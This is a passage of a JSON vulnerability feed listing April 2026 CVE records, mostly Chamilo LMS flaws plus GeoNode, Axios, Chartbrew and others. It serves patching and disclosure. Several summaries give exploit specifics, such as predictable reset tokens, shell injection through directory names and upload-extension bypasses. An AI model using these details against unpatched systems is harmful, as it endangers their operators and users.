validation.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.0003,"ranking_epss":0.08375,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/GeoNode/geonode/releases/tag/4.4.5","https://github.com/GeoNode/geonode/releases/tag/5.0.2","https://www.vulncheck.com/advisories/geonode-ssrf-via-document-upload"],"published_time":"2026-04-10T20:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39922","summary":"GeoNode versions 4.0 before 4.4.5 and 5.0 before 5.0.2 contain a server-side request forgery vulnerability in the service registration endpoint that allows authenticated attackers to trigger outbound network requests to arbitrary URLs by submitting a crafted service URL during form validation. Attackers can probe internal network targets including loopback addresses, RFC1918 private IP ranges, link-local addresses, and cloud metadata services by exploiting insufficient URL validation in the WMS service handler without private IP filtering or allowlist enforcement.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00036,"ranking_epss":0.10664,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/GeoNode/geonode/releases/tag/4.4.5","https://github.com/GeoNode/geonode/releases/tag/5.0.2","https://www.vulncheck.com/advisories/geonode-ssrf-via-service-registration"],"published_time":"2026-04-10T20:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40168","summary":"Postiz is an AI social media scheduling tool. Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF. Although the application validates the initially supplied URL and blocks direct private/internal hosts, it does not re-validate the final destination after HTTP redirects. As a result, an attacker can supply a public HTTPS URL that passes validation and then redirects the server-side request to an internal resource.","cvss":8.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.1214,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/gitroomhq/postiz-app/commit/30e8b777098157362769226d1b46d83ad616cb06","https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.5","https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-34w8-5j2v-h6ww","https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-34w8-5j2v-h6ww"],"published_time":"2026-04-10T20:16:22","vendor":"gitroom","product":"postiz","version":null},{"cve_id":"CVE-2026-40175","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific \"Gadget\" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1.","cvss":10.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":10.0,"cvss_v4":null,"epss":0.00239,"ranking_epss":0.46966,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c","https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1","https://github.com/axios/axios/pull/10660","https://github.com/axios/axios/pull/10688","https://github.com/axios/axios/releases/tag/v0.31.0","https://github.com/axios/axios/releases/tag/v1.15.0","https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx","https://github.com/axios/axios/pull/10660#issuecomment-4224168081"],"published_time":"2026-04-10T20:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40177","summary":"ajenti.plugin.core defines all necessary core elements to allow Ajenti to run properly. Prior to 0.112, if the 2FA was activated, it was possible to bypass the password authentication This vulnerability is fixed in 0.112.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":0.00073,"ranking_epss":0.22038,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ajenti/ajenti/security/advisories/GHSA-3mcx-6wxm-qr8v"],"published_time":"2026-04-10T20:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30232","summary":"Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. This vulnerability is fixed in 4.8.5.","cvss":7.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.6,"cvss_v4":7.8,"epss":0.00041,"ranking_epss":0.12288,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1","https://github.com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv"],"published_time":"2026-04-10T20:16:21","vendor":"depomo","product":"chartbrew","version":null},{"cve_id":"CVE-2026-32252","summary":"Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.9.0, a cross-tenant authorization bypass exists in Chartbrew in GET /team/:team_id/template/generate/:project_id. The GET handler calls checkAccess(req, \"updateAny\", \"chart\") without awaiting the returned promise, and it does not verify that the supplied project_id belongs to req.params.team_id or to the caller's team. As a result, an authenticated attacker with valid template-generation permissions in their own team can request the template model for a project belonging to another team and receive victim project data. This vulnerability is fixed in 4.9.0.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":0.00023,"ranking_epss":0.06149,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chartbrew/chartbrew/commit/bf5919043d3587fcbe76123aaabd9a0a9d1033f1","https://github.com/chartbrew/chartbrew/security/advisories/GHSA-mw4f-cf22-qpcj","https://github.com/chartbrew/chartbrew/security/advisories/GHSA-mw4f-cf22-qpcj"],"published_time":"2026-04-10T20:16:21","vendor":"depomo","product":"chartbrew","version":null},{"cve_id":"CVE-2026-3446","summary":"When calling base64.b64decode() or related functions the decoding process would stop after encountering the first padded quad regardless of whether there was more information to be processed. This can lead to data being accepted which may be processed differently by other implementations. Use \"validate=True\" to enable stricter processing of base64 data.","cvss":6.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.0,"epss":0.00023,"ranking_epss":0.06011,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/python/cpython/commit/1f9958f909c1b41a4ffc0b613ef8ec8fa5e7c474","https://github.com/python/cpython/commit/4561f6418a691b3e89aef0901f53fe0dfb7f7c0e","https://github.com/python/cpython/commit/e31c55121620189a0d1a07b689762d8ca9c1b7fa","https://github.com/python/cpython/issues/145264","https://github.com/python/cpython/pull/145267","https://mail.python.org/archives/list/security-announce@python.org/thread/F5ZT5ICGJ6CKXVUJ34YBVY7WOZ5SHG53/"],"published_time":"2026-04-10T19:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33708","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, the get_user_info_from_username REST API endpoint returns personal information (email, first name, last name, user ID, active status) of any user to any authenticated user, including students. There is no authorization check. This vulnerability is fixed in 1.11.38.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07905,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c8d4afa500c2","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999"],"published_time":"2026-04-10T19:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33710","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(10000, 10000)). The rand(10000, 10000) call always returns exactly 10000 (min == max), making the formula effectively md5(timestamp + user_id*5 - 10000). An attacker who knows a username and approximate key creation time can brute-force the API key. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08181,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/4448701bb8ec557e94ef02d19c72cbe9c49c2d09","https://github.com/chamilo/chamilo-lms/commit/e7400dd840586ae134b286d0a2374f3d269a9a9d","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rpmg-j327-mr39"],"published_time":"2026-04-10T19:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33736","summary":"Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, any authenticated user (including ROLE_STUDENT) can enumerate all platform users and access personal information (email, phone, roles) via GET /api/users, including administrator accounts. This vulnerability is fixed in 2.0.0-RC.3.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07905,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/1739371ce1c562c007c7f5d53e6d65b7a4ff4109","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-fp2p-fj6c-x3x9"],"published_time":"2026-04-10T19:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33737","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, multiple files use simplexml_load_string() without XXE protection. With LIBXML_NOENT flag, arbitrary server files can be read. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07386,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/22b1cb1c609b643765c88654155aba27070c927e","https://github.com/chamilo/chamilo-lms/commit/af6b7002af7c15825e98fc522e2ead0d00cacaa3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-c4ww-qgf2-v89j"],"published_time":"2026-04-10T19:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33698","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, a chained attack can enable otherwise-blocked PHP code from the main/install/ directory and allow an unauthenticated attacker to modify existing files or create new files where allowed by system permissions. This only affects portals with the main/install/ directory still present and read-accessible. This vulnerability is fixed in 1.11.38.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":0.00053,"ranking_epss":0.16447,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/d3355d7873c7e5b907c5fa84cbd5d9b62ed33e51","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-557g-2w66-gpmf"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33702","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an Insecure Direct Object Reference (IDOR) vulnerability in the Learning Path progress saving endpoint. The file lp_ajax_save_item.php accepts a uid (user ID) parameter directly from $_REQUEST and uses it to load and modify another user's Learning Path progress — including score, status, completion, and time — without verifying that the requesting user matches the target user ID. Any authenticated user enrolled in a course can overwrite another user's Learning Path progress by simply changing the uid parameter in the request. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09638,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/6331d051b4468deb5830c01d1e047c5e5cf2c74f","https://github.com/chamilo/chamilo-lms/commit/bf3f6c6949b5c882b48a9914baa19910417e4551","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3rv7-9fhx-j654","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3rv7-9fhx-j654"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33703","summary":"Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the /social-network/personal-data/{userId} endpoint allows any authenticated user to access full personal data and API tokens of arbitrary users by modifying the userId parameter. This results in mass disclosure of sensitive user information and credentials, enabling a full platform data breach. This vulnerability is fixed in 2.0.0-RC.3.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.1,"epss":0.00038,"ranking_epss":0.11431,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-27x6-c5c7-gpf5"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33704","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user (including students) can write arbitrary content to files on the server via the BigUpload endpoint. The key parameter controls the filename and the raw POST body becomes the file content. While .php extensions are filtered to .phps, the .pht extension passes through unmodified. On Apache configurations where .pht is handled as PHP, this leads to Remote Code Execution. This vulnerability is fixed in 1.11.38.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00215,"ranking_epss":0.43996,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/9748f1ffbdb8b6dc84c0e0591c9d3c1d92e21c00","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-phfx-pwwg-945v"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33705","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, Twig template files (.tpl) under /main/template/default/ are directly accessible without authentication via HTTP GET requests. These templates expose internal application logic, variable names, AJAX endpoint URLs, and admin panel structure. This vulnerability is fixed in 1.11.38.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12648,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b98db17bff","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-5wjg-8x28-px57"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33706","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user with a REST API key can modify their own status field via the update_user_from_username endpoint. A student (status=5) can change their status to Teacher/CourseManager (status=1), gaining course creation and management privileges. This vulnerability is fixed in 1.11.38.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06878,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/0acf8a196307c66c049f97f5ff76cf21c4a08127","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3gqc-xr75-pcpw"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33707","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's email can compute the reset token and change the victim's password without authentication. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":9.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.4,"cvss_v4":null,"epss":0.00065,"ranking_epss":0.20204,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/078d7e5b77679fa7ccfcd6783bd5cc683db0bda8","https://github.com/chamilo/chamilo-lms/commit/750a45312a0d5c3ad60dbfbd0d959ca40be4a18c","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-f27g-66gq-g7v2"],"published_time":"2026-04-10T19:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33618","summary":"Chamilo LMS is a learning management system. Prior to .0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisory 1) can inject arbitrary PHP code into the settings, which is then executed when any user (including unauthenticated) requests /platform-config/list. This vulnerability is fixed in 2.0.0-RC.3.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.00047,"ranking_epss":0.14458,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5a219fd09b3b","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-hp4w-jmwc-pg7w"],"published_time":"2026-04-10T19:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27460","summary":"Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Prior to 2.6.5, a critical Denial of Service (DoS) vulnerability was in the recipe import functionality. This vulnerability allows an authenticated user to crash the server or make a significantly degrade its performance by uploading a large size ZIP file (ZIP Bomb). This vulnerability is fixed in 2.6.5.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11798,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-w8pq-4pwf-r2m8","https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-w8pq-4pwf-r2m8"],"published_time":"2026-04-10T19:16:21","vendor":"tandoor","product":"recipes","version":null},{"cve_id":"CVE-2026-40162","summary":"Bugsink is a self-hosted error tracking tool. In 2.1.0, an authenticated file write vulnerability was identified in Bugsink 2.1.0 in the artifact bundle assembly flow. A user with a valid authentication token could cause the application to write attacker-controlled content to a filesystem location writable by the Bugsink process. This vulnerability is fixed in 2.1.1.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00084,"ranking_epss":0.2439,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/bugsink/bugsink/releases/tag/2.1.1","https://github.com/bugsink/bugsink/security/advisories/GHSA-8hw4-fhww-273g"],"published_time":"2026-04-10T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40163","summary":"Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.5, 1.5.5, and 1.6.0-beta.4, the POST /sync/offline_changes endpoint allows an unauthenticated attacker to create arbitrary directories and write a changes.json file with attacker-controlled JSON content anywhere on the server filesystem. The GET /sync/upload_finished endpoint allows an unauthenticated attacker to list arbitrary directory contents and read specific JSON files. This vulnerability is fixed in 1.4.5, 1.5.5, and 1.6.0-beta.4.","cvss":8.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":null,"epss":0.00078,"ranking_epss":0.23162,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saltcorn/saltcorn/security/advisories/GHSA-32pv-mpqg-h292"],"published_time":"2026-04-10T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5483","summary":"A flaw was found in odh-dashboard in Red Hat Openshift AI. This vulnerability in the `odh-dashboard` component of Red Hat OpenShift AI (RHOAI) allows for the disclosure of Kubernetes Service Account tokens through a NodeJS endpoint. This could enable an attacker to gain unauthorized access to Kubernetes resources.","cvss":8.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.5,"cvss_v4":null,"epss":0.00064,"ranking_epss":0.19689,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://access.redhat.com/errata/RHSA-2026:7397","https://access.redhat.com/errata/RHSA-2026:7398","https://access.redhat.com/errata/RHSA-2026:7403","https://access.redhat.com/errata/RHSA-2026:7404","https://access.redhat.com/security/cve/CVE-2026-5483","https://bugzilla.redhat.com/show_bug.cgi?id=2454764"],"published_time":"2026-04-10T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32894","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook result view page allows any authenticated teacher to delete any student's grade result across the entire platform by manipulating the delete_mark or resultdelete GET parameters. No ownership or course-scope verification is performed. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08074,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/3b03306d1a0301a81b9284e86893b27f518ab151","https://github.com/chamilo/chamilo-lms/commit/740f5a6e192a52a3adde3c3241c86401b1d2c519","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rqpg-p95v-fv98","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rqpg-p95v-fv98"],"published_time":"2026-04-10T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32930","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook evaluation edit page allows any authenticated teacher to view and modify the settings (name, max score, weight) of evaluations belonging to any other course by manipulating the editeval GET parameter. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06812,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/63e1e6d3d717bd537c7c61719416da35aaa658dd","https://github.com/chamilo/chamilo-lms/commit/f03f681df939db0429edc8414fb3ce4e4b80d79d","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-9h22-wrg7-82q6"],"published_time":"2026-04-10T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32931","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in the exercise sound upload function allows an authenticated teacher to upload a PHP webshell by spoofing the Content-Type header to audio/mpeg. The uploaded file retains its original .php extension and is placed in a web-accessible directory, enabling Remote Code Execution as the web server user (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00158,"ranking_epss":0.36599,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/8cbe660de267f2b6ed625433bdfcf38dee8752b4","https://github.com/chamilo/chamilo-lms/commit/d5ef5153df3d1b2de112cbeb190cdd10bea457f3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-863j-h6pf-3xhx"],"published_time":"2026-04-10T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32932","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Open Redirect vulnerability in the session course edit page allows an attacker to redirect an authenticated administrator to an arbitrary external URL after saving coach assignment changes. The redirect also leaks the id_session parameter to the attacker's server. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":4.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.7,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07812,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/b005b3d3e76cf6eafc03e15ac445ceff089551c0","https://github.com/chamilo/chamilo-lms/commit/fbd8d7eb37d05ec974293f05b6ffaaf9102ebd2b","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q2cp-3qj3-wx8q"],"published_time":"2026-04-10T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33141","summary":"Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the REST API stats endpoint allows any authenticated user (including low-privilege students with ROLE_USER) to read any other user's learning progress, certificates, and gradebook scores for any course, without enrollment or supervisory relationship. This vulnerability is fixed in 2.0.0-RC.3.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.03844,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/792ba05953470ca971617fe2674ed14c1479fa80","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-j2pr-2r5w-jrpj"],"published_time":"2026-04-10T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31939","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file feletion. User input from $_REQUEST['test'] is concatenated directly into filesystem path without canonicalization or traversal checks. This vulnerability is fixed in 1.11.38.","cvss":8.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.3,"cvss_v4":null,"epss":0.00041,"ranking_epss":0.12334,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/4dddcc19d36119da27b7c49eb84a035800abae78","https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.38","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-8q8c-v75x-q2hx","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-8q8c-v75x-q2hx"],"published_time":"2026-04-10T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31940","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are directly used to set the PHP session ID before loading global bootstrap. This leads to session fixation. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10494,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/ce0192c62e48c9d9474d915c541b3274844afbf9","https://github.com/chamilo/chamilo-lms/commit/e337b7cc74a0276a0b4f91f9282204d20cac1869","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-4gp7-cfjh-77gv"],"published_time":"2026-04-10T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31941","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via the social_wall_new_msg_main POST parameter and performs two server-side HTTP requests to that URL without validating whether the target is an internal or external resource. This allows an authenticated attacker to force the server to make arbitrary HTTP requests to internal services, scan internal ports, and access cloud instance metadata. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07386,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/e3790c5f0ff3b4dc547c2099fadf5c438c1bb265","https://github.com/chamilo/chamilo-lms/commit/ea6b7b7e90580c9b01dc4bcafe4ad737061e0ead","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q74c-mx8x-489h"],"published_time":"2026-04-10T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32892","summary":"Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the file move function. The move() function in fileManage.lib.php passes user-controlled path values directly into exec() shell commands without using escapeshellarg(). When a user moves a document via document.php, the move_to POST parameter — which only passes through Security::remove_XSS() (an HTML-only filter) — is concatenated directly into shell commands such as exec(\"mv $source $target\"). By default, Chamilo allows all authenticated users to create courses (allow_users_to_create_courses = true). Any user who is a teacher in a course (including self-created courses) can move documents, making this vulnerability exploitable by any authenticated user. The attacker must first place a directory with shell metacharacters in its name on the filesystem (achievable via Course Backup Import), then move a document into that directory to trigger arbitrary command execution as the web server user (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":0.00194,"ranking_epss":0.41378,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/3597b19b73d73d681e4fb503285e9bbfe71714bf","https://github.com/chamilo/chamilo-lms/commit/62671e5e268f235cddfba704edee90f35c234df1","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-59cv-qh65-vvrr"],"published_time":"2026-04-10T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32893","summary":"Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, a Reflected Cross-Site Scripting (XSS) vulnerability in the exercise question list admin panel allows an attacker to execute arbitrary JavaScript in an authenticated teacher's browser. The pagination code merges all $_GET parameters via array_merge() and outputs the result via http_build_query() directly into HTML href attributes without htmlspecialchars() encoding. This vulnerability is fixed in 2.0.0-RC.3.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08061,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/72bc403f89b1ebb73a139f8f6cf0478857592276","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-37jh-g64j-88mc"],"published_time":"2026-04-10T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-66447","summary":"Chamilo LMS is a learning management system. From 1.11.0 to 2.0-beta.1, anyone can trigger a malicious redirect through the use of the redirect parameter to /login. This vulnerability is 